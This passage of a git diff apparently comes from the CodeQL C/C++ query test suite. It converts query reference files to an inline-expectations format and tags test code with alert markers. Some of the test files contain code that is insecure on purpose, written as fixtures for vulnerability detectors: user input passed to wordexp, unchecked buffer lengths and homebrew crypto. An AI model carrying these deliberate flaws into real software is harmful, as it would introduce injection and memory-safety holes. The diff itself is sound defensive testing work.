.../Security/CWE/CWE-120/semmle/tests/tests.c | 42 ++-- .../CWE/CWE-120/semmle/tests/tests2.cpp | 14 +- .../CWE/CWE-120/semmle/tests/unions.c | 4 +- .../CWE-120/semmle/tests/var_size_struct.cpp | 2 +- .../CWE/CWE-120/semmle/tests/varbuffer.c | 22 +- .../tests/UnterminatedVarargsCall.qlref | 3 +- .../CWE/CWE-121/semmle/tests/more_tests.cpp | 10 +- .../Security/CWE/CWE-121/semmle/tests/tests.c | 8 +- ...Based_Buffer_Overflow__c_CWE129_fgets_01.c | 4 +- .../ImproperArrayIndexValidation.expected | 4 +- .../ImproperArrayIndexValidation.qlref | 3 +- .../ImproperArrayIndexValidation.expected | 10 +- .../ImproperArrayIndexValidation.qlref | 3 +- .../ImproperArrayIndexValidation/test1.c | 10 +- .../NoSpaceForZeroTerminator.qlref | 3 +- .../CWE-131/NoSpaceForZeroTerminator/test.c | 8 +- .../CWE-131/NoSpaceForZeroTerminator/test.cpp | 18 +- .../NoSpaceForZeroTerminator/test2.cpp | 8 +- .../SAMATE/UncontrolledFormatString.expected | 8 +- .../SAMATE/UncontrolledFormatString.qlref | 3 +- ...char_connect_socket_w32_vsnprintf_01_bad.c | 4 +- .../SAMATE/char_console_fprintf_01_bad.c | 4 +- .../SAMATE/char_environment_fprintf_01_bad.c | 4 +- .../CWE/CWE-134/semmle/argv/argvLocal.c | 50 ++--- .../CWE-134/semmle/argv/argvLocal.expected | 50 ++--- .../CWE/CWE-134/semmle/argv/argvLocal.qlref | 3 +- .../semmle/consts/NonConstantFormat.expected | 48 ++--- .../semmle/consts/NonConstantFormat.qlref | 3 +- .../CWE/CWE-134/semmle/consts/consts.cpp | 40 ++-- .../CWE/CWE-134/semmle/funcs/funcsLocal.c | 30 +-- .../CWE-134/semmle/funcs/funcsLocal.expected | 18 +- .../CWE/CWE-134/semmle/funcs/funcsLocal.qlref | 3 +- .../UncontrolledFormatString.expected | 12 +- .../globalVars/UncontrolledFormatString.qlref | 3 +- .../CWE-134/semmle/globalVars/globalVars.c | 12 +- .../Security/CWE/CWE-134/semmle/ifs/ifs.c | 24 +-- .../CWE/CWE-134/semmle/ifs/ifs.expected | 24 +-- .../Security/CWE/CWE-134/semmle/ifs/ifs.qlref | 3 +- .../CWE-190/SAMATE/ArithmeticTainted.expected | 4 +- .../CWE-190/SAMATE/ArithmeticTainted.qlref | 3 +- .../SAMATE/ArithmeticUncontrolled.expected | 26 +-- .../SAMATE/ArithmeticUncontrolled.qlref | 3 +- .../SAMATE/ArithmeticWithExtremeValues.qlref | 3 +- .../SAMATE/IntegerOverflowTainted.qlref | 3 +- .../Security/CWE/CWE-190/SAMATE/examples.cpp | 12 +- .../ArithmeticUncontrolled.expected | 56 ++--- .../ArithmeticUncontrolled.qlref | 3 +- .../semmle/ArithmeticUncontrolled/test.c | 36 ++-- .../semmle/ArithmeticUncontrolled/test.cpp | 56 ++--- .../ArithmeticWithExtremeValues.qlref | 3 +- .../semmle/ArithmeticWithExtremeValues/test.c | 12 +- .../ComparisonWithWiderType.qlref | 3 +- .../semmle/ComparisonWithWiderType/test.c | 34 +-- .../TaintedAllocationSize.expected | 42 ++-- .../TaintedAllocationSize.qlref | 3 +- .../semmle/TaintedAllocationSize/test.cpp | 62 +++--- .../semmle/tainted/ArithmeticTainted.expected | 24 +-- .../semmle/tainted/ArithmeticTainted.qlref | 3 +- .../tainted/IntegerOverflowTainted.qlref | 3 +- .../CWE/CWE-190/semmle/tainted/main.cpp | 2 +- .../CWE/CWE-190/semmle/tainted/test.c | 6 +- .../CWE/CWE-190/semmle/tainted/test2.cpp | 16 +- .../CWE/CWE-190/semmle/tainted/test3.c | 4 +- .../CWE/CWE-190/semmle/tainted/test4.cpp | 2 +- .../CWE/CWE-190/semmle/tainted/test5.cpp | 8 +- .../CWE/CWE-190/semmle/tainted/test6.cpp | 6 +- ...gnedDifferenceExpressionComparedZero.qlref | 3 +- .../test.cpp | 34 +-- .../CWE/CWE-193/InvalidPointerDeref.qlref | 2 +- .../IntegerOverflowTainted.qlref | 3 +- .../SAMATE/IntegerOverflowTainted/tests.cpp | 2 +- .../tests/DangerousFunctionOverflow.qlref | 3 +- .../semmle/tests/DangerousUseOfCin.qlref | 3 +- .../CWE-242/semmle/tests/OverrunWrite.qlref | 3 +- .../semmle/tests/OverrunWriteFloat.qlref | 3 +- .../semmle/tests/VeryLikelyOverrunWrite.qlref | 3 +- .../CWE/CWE-242/semmle/tests/tests.cpp | 78 +++---- .../CWE/CWE-253/HResultBooleanConversion.c | 22 +- .../CWE/CWE-253/HResultBooleanConversion.cpp | 22 +- .../CWE-253/HResultBooleanConversion.qlref | 3 +- .../AuthenticationBypass.expected | 14 +- .../AuthenticationBypass.qlref | 3 +- .../semmle/AuthenticationBypass/test.cpp | 20 +- .../CWE/CWE-295/SSLResultConflation.qlref | 3 +- .../CWE/CWE-295/SSLResultNotChecked.qlref | 3 +- .../query-tests/Security/CWE/CWE-295/test.cpp | 18 +- .../Security/CWE/CWE-295/test2.cpp | 8 +- .../tests/CleartextBufferWrite.expected | 6 +- .../semmle/tests/CleartextBufferWrite.qlref | 3 +- .../semmle/tests/CleartextFileWrite.expected | 32 +-- .../semmle/tests/CleartextFileWrite.qlref | 3 +- .../tests/CleartextTransmission.expected | 82 +++---- .../semmle/tests/CleartextTransmission.qlref | 3 +- .../CWE/CWE-311/semmle/tests/test.cpp | 10 +- .../CWE/CWE-311/semmle/tests/test2.cpp | 28 +-- .../CWE/CWE-311/semmle/tests/test3.cpp | 110 +++++----- .../CWE/CWE-319/UseOfHttp/UseOfHttp.expected | 14 +- .../CWE/CWE-319/UseOfHttp/UseOfHttp.qlref | 3 +- .../Security/CWE/CWE-319/UseOfHttp/test.cpp | 14 +- .../CWE/CWE-326/InsufficientKeySize.expected | 8 +- .../CWE/CWE-326/InsufficientKeySize.qlref | 3 +- .../query-tests/Security/CWE/CWE-326/test.cpp | 6 +- .../CWE/CWE-327/BrokenCryptoAlgorithm.qlref | 3 +- .../query-tests/Security/CWE/CWE-327/test.cpp | 2 +- .../Security/CWE/CWE-327/test2.cpp | 2 +- .../CWE-367/semmle/TOCTOUFilesystemRace.qlref | 3 +- .../Security/CWE/CWE-367/semmle/test2.cpp | 32 +-- .../IteratorToExpiredContainer.qlref | 3 +- .../tests/IteratorToExpiredContainer/test.cpp | 12 +- .../tests/UseAfterFree/UseAfterFree.expected | 30 +-- .../tests/UseAfterFree/UseAfterFree.qlref | 3 +- .../semmle/tests/UseAfterFree/test.cpp | 52 ++--- .../UseOfStringAfterLifetimeEnds.qlref | 4 +- .../UseOfStringAfterLifetimeEnds/test.cpp | 26 +-- .../UseOfUniquePointerAfterLifetimeEnds.qlref | 3 +- .../UseOfUniquePtrAfterLifetimeEnds/test.cpp | 20 +- .../CWE/CWE-428/UnsafeCreateProcessCall.cpp | 26 +-- .../CWE/CWE-428/UnsafeCreateProcessCall.qlref | 3 +- .../ConditionallyUninitializedVariable.qlref | 3 +- .../examples.cpp | 2 +- .../test.cpp | 4 +- .../semmle/tests/UninitializedLocal.expected | 30 +-- .../semmle/tests/UninitializedLocal.qlref | 3 +- .../CWE/CWE-457/semmle/tests/errors.cpp | 4 +- .../CWE/CWE-457/semmle/tests/test.cpp | 52 ++--- .../IncorrectPointerScaling.qlref | 3 +- .../IncorrectPointerScalingChar.qlref | 3 +- .../IncorrectPointerScalingVoid.qlref | 3 +- .../semmle/IncorrectPointerScaling/test.cpp | 18 +- .../SuspiciousAddWithSizeof.qlref | 3 +- .../SuspiciousAddWithSizeof/buildless.cpp | 4 +- .../semmle/SuspiciousAddWithSizeof/test.cpp | 14 +- .../CWE-497/SAMATE/ExposedSystemData.expected | 2 +- .../CWE-497/SAMATE/ExposedSystemData.qlref | 3 +- .../PotentiallyExposedSystemData.expected | 4 +- .../SAMATE/PotentiallyExposedSystemData.qlref | 3 +- .../Security/CWE/CWE-497/SAMATE/tests.c | 4 +- .../PotentiallyExposedSystemData.expected | 36 ++-- .../tests/PotentiallyExposedSystemData.qlref | 3 +- .../CWE/CWE-497/semmle/tests/tests.cpp | 38 ++-- .../CWE/CWE-497/semmle/tests/tests_passwd.cpp | 6 +- .../IncorrectAllocationErrorHandling.qlref | 3 +- .../query-tests/Security/CWE/CWE-570/test.cpp | 40 ++-- .../Security/CWE/CWE-611/XXE.expected | 62 +++--- .../Security/CWE/CWE-611/XXE.qlref | 3 +- .../Security/CWE/CWE-611/tests.cpp | 40 ++-- .../Security/CWE/CWE-611/tests2.cpp | 12 +- .../Security/CWE/CWE-611/tests3.cpp | 20 +- .../Security/CWE/CWE-611/tests4.cpp | 10 +- .../Security/CWE/CWE-611/tests5.cpp | 22 +- .../DangerousUseOfCin/DangerousUseOfCin.qlref | 3 +- .../CWE-676/SAMATE/DangerousUseOfCin/test.cpp | 2 +- .../DangerousUseOfCin/DangerousUseOfCin.qlref | 3 +- .../CWE-676/semmle/DangerousUseOfCin/test.cpp | 2 +- .../DangerousFunctionOverflow.qlref | 3 +- .../PotentiallyDangerousFunction.qlref | 3 +- .../PotentiallyDangerousFunction/test.c | 12 +- .../CWE/CWE-732/OpenCallMissingModeArgument.c | 8 +- .../CWE-732/OpenCallMissingModeArgument.qlref | 3 +- .../CWE-732/UnsafeDaclSecurityDescriptor.cpp | 6 +- .../UnsafeDaclSecurityDescriptor.qlref | 3 +- .../semmle/tests/DiningPhilosophers.cpp | 10 +- .../CWE-764/semmle/tests/LockOrderCycle.qlref | 3 +- .../CWE-764/semmle/tests/TwiceLocked.qlref | 3 +- .../CWE-764/semmle/tests/UnreleasedLock.qlref | 3 +- .../CWE/CWE-764/semmle/tests/test.cpp | 38 ++-- .../CWE-772/SAMATE/FileMayNotBeClosed.qlref | 3 +- .../CWE/CWE-772/SAMATE/FileNeverClosed.qlref | 3 +- .../CWE-772/SAMATE/MemoryMayNotBeFreed.qlref | 3 +- .../CWE/CWE-772/SAMATE/MemoryNeverFreed.qlref | 3 +- .../Security/CWE/CWE-772/SAMATE/tests.cpp | 14 +- .../tests-file/FileMayNotBeClosed.qlref | 3 +- .../semmle/tests-file/FileNeverClosed.qlref | 3 +- .../CWE/CWE-772/semmle/tests-file/test.cpp | 34 +-- .../tests-memory/MemoryMayNotBeFreed.qlref | 3 +- .../tests-memory/MemoryNeverFreed.qlref | 3 +- .../CWE/CWE-772/semmle/tests-memory/test.cpp | 52 ++--- .../TaintedCondition.expected | 4 +- .../TaintedCondition/TaintedCondition.qlref | 3 +- .../CWE-807/semmle/TaintedCondition/test.cpp | 4 +- ...teLoopWithUnsatisfiableExitCondition.qlref | 3 +- .../test.cpp | 10 +- .../CWE/CWE-843/TypeConfusion.expected | 20 +- .../Security/CWE/CWE-843/TypeConfusion.qlref | 3 +- .../query-tests/Security/CWE/CWE-843/test.cpp | 36 ++-- .../query-tests/Summary/LinesOfCode.qlref | 2 +- .../query-tests/Summary/LinesOfUserCode.qlref | 2 +- .../query-tests/definitions/definitions.qlref | 2 +- .../AV Rule 1/AV Rule 1.c | 2 +- .../AV Rule 1/AV Rule 1.qlref | 3 +- .../AV Rule 13/AV Rule 13.qlref | 3 +- .../jsf/4.04 Environment/AV Rule 13/test.cpp | 4 +- .../AV Rule 32/AV Rule 32.qlref | 3 +- .../AV Rule 32/test.c | 2 +- .../AV Rule 35/AV Rule 35.qlref | 2 +- .../AV Rule 53 54/AV Rule 53.1.qlref | 3 +- .../4.09 Style/AV Rule 53 54/AV Rule 53.qlref | 2 +- .../4.09 Style/AV Rule 53 54/AV Rule 54.qlref | 2 +- .../jsf/4.09 Style/AV Rule 53 54/test.c | 2 +- .../4.10 Classes/AV Rule 73/AV Rule 73.cpp | 2 +- .../4.10 Classes/AV Rule 73/AV Rule 73.qlref | 3 +- .../jsf/4.10 Classes/AV Rule 73/original.cpp | 4 +- .../4.10 Classes/AV Rule 76/AV Rule 76.qlref | 3 +- .../jsf/4.10 Classes/AV Rule 76/test.cpp | 6 +- .../AV Rule 77.1/AV Rule 77.1.qlref | 3 +- .../jsf/4.10 Classes/AV Rule 77.1/test.cpp | 2 +- .../4.10 Classes/AV Rule 78/AV Rule 78.cpp | 6 +- .../4.10 Classes/AV Rule 78/AV Rule 78.qlref | 3 +- .../4.10 Classes/AV Rule 79/AV Rule 79.cpp | 16 +- .../4.10 Classes/AV Rule 79/AV Rule 79.qlref | 3 +- .../4.10 Classes/AV Rule 79/Container2.cpp | 2 +- .../4.10 Classes/AV Rule 79/DeleteThis.cpp | 8 +- .../AV Rule 79/ExternalOwners.cpp | 2 +- .../jsf/4.10 Classes/AV Rule 79/Lambda.cpp | 2 +- .../4.10 Classes/AV Rule 79/ListDelete.cpp | 2 +- .../4.10 Classes/AV Rule 79/NoDestructor.cpp | 2 +- .../4.10 Classes/AV Rule 79/PlacementNew.cpp | 2 +- .../AV Rule 79/SelfRegistering.cpp | 2 +- .../jsf/4.10 Classes/AV Rule 79/Variants.cpp | 10 +- .../jsf/4.10 Classes/AV Rule 79/Wrapped.cpp | 4 +- .../4.10 Classes/AV Rule 82/AV Rule 82.cpp | 8 +- .../4.10 Classes/AV Rule 82/AV Rule 82.qlref | 3 +- .../4.10 Classes/AV Rule 85/AV Rule 85.cpp | 10 +- .../4.10 Classes/AV Rule 85/AV Rule 85.qlref | 3 +- .../4.10 Classes/AV Rule 97/AV Rule 97.qlref | 3 +- .../jsf/4.10 Classes/AV Rule 97/jsf97.cpp | 10 +- .../AV Rule 107/AV Rule 107.qlref | 3 +- .../jsf/4.13 Functions/AV Rule 107/test.c | 8 +- .../AV Rule 114/AV Rule 114.qlref | 3 +- .../jsf/4.13 Functions/AV Rule 114/complex.c | 4 +- .../jsf/4.13 Functions/AV Rule 114/test.c | 6 +- .../jsf/4.13 Functions/AV Rule 114/test.cpp | 16 +- .../AV Rule 145/AV Rule 145.qlref | 3 +- .../4.16 Initialization/AV Rule 145/test.c | 6 +- .../AV Rule 157/AV Rule 157.qlref | 3 +- .../jsf/4.21 Operators/AV Rule 157/test.c | 6 +- .../AV Rule 164/AV Rule 164.qlref | 3 +- .../jsf/4.21 Operators/AV Rule 164/test.c | 16 +- .../AV Rule 165/AV Rule 165.qlref | 3 +- .../jsf/4.21 Operators/AV Rule 165/test.c | 18 +- .../AV Rule 166/AV Rule 166.qlref | 3 +- .../jsf/4.21 Operators/AV Rule 166/test.c | 4 +- .../AV Rule 176/176.cpp | 10 +- .../AV Rule 176/176.qlref | 3 +- .../AV Rule 186/AV Rule 186.qlref | 3 +- .../AV Rule 186/test.c | 4 +- .../AV Rule 193/AV Rule 193.c | 4 +- .../AV Rule 193/AV Rule 193.qlref | 3 +- .../AV Rule 193/nested.c | 4 +- .../AV Rule 193/test.c | 12 +- .../AV Rule 196/AV Rule 196.c | 8 +- .../AV Rule 196/AV Rule 196.qlref | 3 +- .../AV Rule 201/AV Rule 201.c | 22 +- .../AV Rule 201/AV Rule 201.qlref | 3 +- .../AV Rule 201/NestedLoopSameVar.qlref | 3 +- .../AV Rule 201/StructMembers.cpp | 4 +- .../AV Rule 210/AV Rule 210.c | 10 +- .../AV Rule 210/AV Rule 210.qlref | 3 +- 789 files changed, 4121 insertions(+), 3814 deletions(-) diff --git a/cpp/ql/test/examples/BadLocking/AV Rule 107.qlref b/cpp/ql/test/examples/BadLocking/AV Rule 107.qlref index 57f35c3bcf2d..e24890cc9a86 100644 --- a/cpp/ql/test/examples/BadLocking/AV Rule 107.qlref +++ b/cpp/ql/test/examples/BadLocking/AV Rule 107.qlref @@ -1 +1,2 @@ -jsf/4.13 Functions/AV Rule 107.ql +query: jsf/4.13 Functions/AV Rule 107.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/examples/BadLocking/LocalVariableHidesGlobalVariable.qlref b/cpp/ql/test/examples/BadLocking/LocalVariableHidesGlobalVariable.qlref index 0267b31251d3..326ddde08d3e 100644 --- a/cpp/ql/test/examples/BadLocking/LocalVariableHidesGlobalVariable.qlref +++ b/cpp/ql/test/examples/BadLocking/LocalVariableHidesGlobalVariable.qlref @@ -1 +1,2 @@ -Best Practices/Hiding/LocalVariableHidesGlobalVariable.ql +query: Best Practices/Hiding/LocalVariableHidesGlobalVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/examples/BadLocking/UnintendedDeclaration.cpp b/cpp/ql/test/examples/BadLocking/UnintendedDeclaration.cpp index 034291f4d197..babe4a7fced2 100644 --- a/cpp/ql/test/examples/BadLocking/UnintendedDeclaration.cpp +++ b/cpp/ql/test/examples/BadLocking/UnintendedDeclaration.cpp @@ -48,7 +48,7 @@ void test1() void test2() { - Lock myLock(); // BAD (interpreted as a function declaration, this does nothing) + Lock myLock(); // BAD (interpreted as a function declaration, this does nothing) // $ Alert[cpp/function-in-block] // ... } @@ -62,14 +62,14 @@ void test3() void test4() { - Lock(myMutex); // BAD (creates an uninitialized variable called `myMutex`, probably not intended) + Lock(myMutex); // BAD (creates an uninitialized variable called `myMutex`, probably not intended) // $ Alert[cpp/local-variable-hides-global-variable] // ... } void test5() { - Lock myLock(Mutex); // BAD (interpreted as a function declaration, this does nothing) + Lock myLock(Mutex); // BAD (interpreted as a function declaration, this does nothing) // $ Alert[cpp/function-in-block] // ... } diff --git a/cpp/ql/test/examples/expressions/PrintAST.qlref b/cpp/ql/test/examples/expressions/PrintAST.qlref index 6fcb30ac7a6e..645e39136f5b 100644 --- a/cpp/ql/test/examples/expressions/PrintAST.qlref +++ b/cpp/ql/test/examples/expressions/PrintAST.qlref @@ -1 +1 @@ -semmle/code/cpp/PrintAST.ql \ No newline at end of file +query: semmle/code/cpp/PrintAST.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/NoCheckBeforeUnsafePutUser/NoCheckBeforeUnsafePutUser.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/NoCheckBeforeUnsafePutUser/NoCheckBeforeUnsafePutUser.qlref index a4543b332ddb..b88242c72ab1 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/NoCheckBeforeUnsafePutUser/NoCheckBeforeUnsafePutUser.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/NoCheckBeforeUnsafePutUser/NoCheckBeforeUnsafePutUser.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-020/NoCheckBeforeUnsafePutUser.ql +query: experimental/Security/CWE/CWE-020/NoCheckBeforeUnsafePutUser.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/semmle/tests/LateCheckOfFunctionArgument.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/semmle/tests/LateCheckOfFunctionArgument.qlref index e9107625d293..b0ca696135e2 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/semmle/tests/LateCheckOfFunctionArgument.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/semmle/tests/LateCheckOfFunctionArgument.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-020/LateCheckOfFunctionArgument.ql +query: experimental/Security/CWE/CWE-020/LateCheckOfFunctionArgument.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/semmle/tests/test.c b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/semmle/tests/test.c index 40fb688fb203..4a1ceb2ec8a6 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/semmle/tests/test.c +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-020/semmle/tests/test.c @@ -3,6 +3,6 @@ void workFunction_0(char *s) { char buf[80], buf1[8]; if(len<0) return; memset(buf,0,len); //GOOD - memset(buf1,0,len1); //BAD + memset(buf1,0,len1); //BAD // $ Alert if(len1<0) return; } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.expected index e3afe00da6ef..b03a1ff7040e 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.expected @@ -1,3 +1,5 @@ +#select +| test.cpp:29:13:29:20 | *filePath | test.cpp:22:27:22:30 | **argv | test.cpp:29:13:29:20 | *filePath | Using user-supplied data in a `wordexp` command, without disabling command substitution, can make code vulnerable to command injection. | edges | test.cpp:22:27:22:30 | **argv | test.cpp:23:20:23:26 | *access to array | provenance | | | test.cpp:23:20:23:26 | *access to array | test.cpp:29:13:29:20 | *filePath | provenance | | @@ -6,5 +8,3 @@ nodes | test.cpp:23:20:23:26 | *access to array | semmle.label | *access to array | | test.cpp:29:13:29:20 | *filePath | semmle.label | *filePath | subpaths -#select -| test.cpp:29:13:29:20 | *filePath | test.cpp:22:27:22:30 | **argv | test.cpp:29:13:29:20 | *filePath | Using user-supplied data in a `wordexp` command, without disabling command substitution, can make code vulnerable to command injection. | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.qlref index ecff539f3e63..d58923728783 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/WordexpTainted.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-078/WordexpTainted.ql \ No newline at end of file +query: experimental/Security/CWE/CWE-078/WordexpTainted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/test.cpp index 0ae98b8f1632..7c8224ce6534 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-078/test.cpp @@ -19,14 +19,14 @@ enum { int wordexp(const char *restrict s, wordexp_t *restrict p, int flags); -int main(int argc, char** argv) { +int main(int argc, char** argv) { // $ Source char *filePath = argv[2]; { // BAD: the user string is injected directly into `wordexp` which performs command substitution wordexp_t we; - wordexp(filePath, &we, 0); + wordexp(filePath, &we, 0); // $ Alert } { diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1041/semmle/tests/FindWrapperFunctions.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1041/semmle/tests/FindWrapperFunctions.qlref index 22dae13892f8..c3c257615c32 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1041/semmle/tests/FindWrapperFunctions.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1041/semmle/tests/FindWrapperFunctions.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-1041/FindWrapperFunctions.ql +query: experimental/Security/CWE/CWE-1041/FindWrapperFunctions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1041/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1041/semmle/tests/test.cpp index 4f862a324e59..bd7e8f40d74c 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1041/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1041/semmle/tests/test.cpp @@ -20,7 +20,7 @@ void myFclose(FILE * fmy) int main(int argc, char *argv[]) { fe = fopen("myFile.txt", "wt"); - fclose(fe); // BAD + fclose(fe); // BAD // $ Alert fe = fopen("myFile.txt", "wt"); myFclose(fe); // GOOD return 0; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1126/semmle/tests/DeclarationOfVariableWithUnnecessarilyWideScope.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1126/semmle/tests/DeclarationOfVariableWithUnnecessarilyWideScope.qlref index 6da5822f7f02..2a1e44064547 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1126/semmle/tests/DeclarationOfVariableWithUnnecessarilyWideScope.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1126/semmle/tests/DeclarationOfVariableWithUnnecessarilyWideScope.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-1126/DeclarationOfVariableWithUnnecessarilyWideScope.ql +query: experimental/Security/CWE/CWE-1126/DeclarationOfVariableWithUnnecessarilyWideScope.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1126/semmle/tests/test.c b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1126/semmle/tests/test.c index 47d89188e6b4..fc078db7924c 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1126/semmle/tests/test.c +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1126/semmle/tests/test.c @@ -11,7 +11,7 @@ void workFunction_0(char *s) { while(intIndex > 2) { buf[intIndex] = 1; - int intIndex; // BAD + int intIndex; // BAD // $ Alert intIndex--; } intIndex = 10; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1240/CustomCryptographicPrimitive.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1240/CustomCryptographicPrimitive.qlref index ddf0380834b1..30a603676bb1 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1240/CustomCryptographicPrimitive.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1240/CustomCryptographicPrimitive.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-1240/CustomCryptographicPrimitive.ql +query: experimental/Security/CWE/CWE-1240/CustomCryptographicPrimitive.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1240/tests_crypto.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1240/tests_crypto.cpp index 6aa1bbe06a7f..56dd45e3a64a 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1240/tests_crypto.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-1240/tests_crypto.cpp @@ -8,7 +8,7 @@ int strlen(const char *string); // the following function is homebrew crypto written for this test. This is a bad algorithm // on multiple levels and should never be used in cryptography. -void encryptString(char *string, unsigned int key) { +void encryptString(char *string, unsigned int key) { // $ Alert char *ptr = string; int len = strlen(string); @@ -27,7 +27,7 @@ void encryptString(char *string, unsigned int key) { // the following function is homebrew crypto written for this test. This is a bad algorithm // on multiple levels and should never be used in cryptography. -void MyEncrypt(const unsigned int *dataIn, unsigned int *dataOut, unsigned int dataSize, unsigned int key[2]) { +void MyEncrypt(const unsigned int *dataIn, unsigned int *dataOut, unsigned int dataSize, unsigned int key[2]) { // $ Alert unsigned int state[2]; unsigned int t; @@ -48,7 +48,7 @@ void MyEncrypt(const unsigned int *dataIn, unsigned int *dataOut, unsigned int d // the following function resembles an implementation of the AES "mix columns" // step. It is not accurate, efficient or safe and should never be used in // cryptography. -void mix_columns(const uint8_t inputs[4], uint8_t outputs[4]) { +void mix_columns(const uint8_t inputs[4], uint8_t outputs[4]) { // $ Alert // The "mix columns" step takes four bytes as inputs. Each byte represents a // polynomial with 8 one-bit coefficients, e.g. input bits 00001101 // represent the polynomial x^3 + x^2 + 1. Arithmetic is reduced modulo @@ -80,7 +80,7 @@ void mix_columns(const uint8_t inputs[4], uint8_t outputs[4]) { // the following function resembles initialization of an S-box as may be done // in an implementation of DES, AES and other encryption algorithms. It is not // accurate, efficient or safe and should never be used in cryptography. -void init_aes_sbox(unsigned char data[256]) { +void init_aes_sbox(unsigned char data[256]) { // $ Alert // initialize `data` in a loop using lots of ^, ^= and << operations and // a few fixed constants. unsigned int state = 0x12345678; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/DangerousWorksWithMultibyteOrWideCharacters.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/DangerousWorksWithMultibyteOrWideCharacters.qlref index 228684a4e250..9c9b71af695a 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/DangerousWorksWithMultibyteOrWideCharacters.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/DangerousWorksWithMultibyteOrWideCharacters.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-125/DangerousWorksWithMultibyteOrWideCharacters.ql +query: experimental/Security/CWE/CWE-125/DangerousWorksWithMultibyteOrWideCharacters.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test.cpp index b4f0830039d8..9c5f15048fef 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test.cpp @@ -63,7 +63,7 @@ static void badTest1(const char* ptr) int ret; int len; len = strlen(ptr); - for (wchar_t wc; (ret = mbtowc(&wc, ptr, 4)) > 0; len-=ret) { // BAD:we can get unpredictable results + for (wchar_t wc; (ret = mbtowc(&wc, ptr, 4)) > 0; len-=ret) { // BAD:we can get unpredictable results // $ Alert wprintf(L"%lc", wc); ptr += ret; } @@ -73,7 +73,7 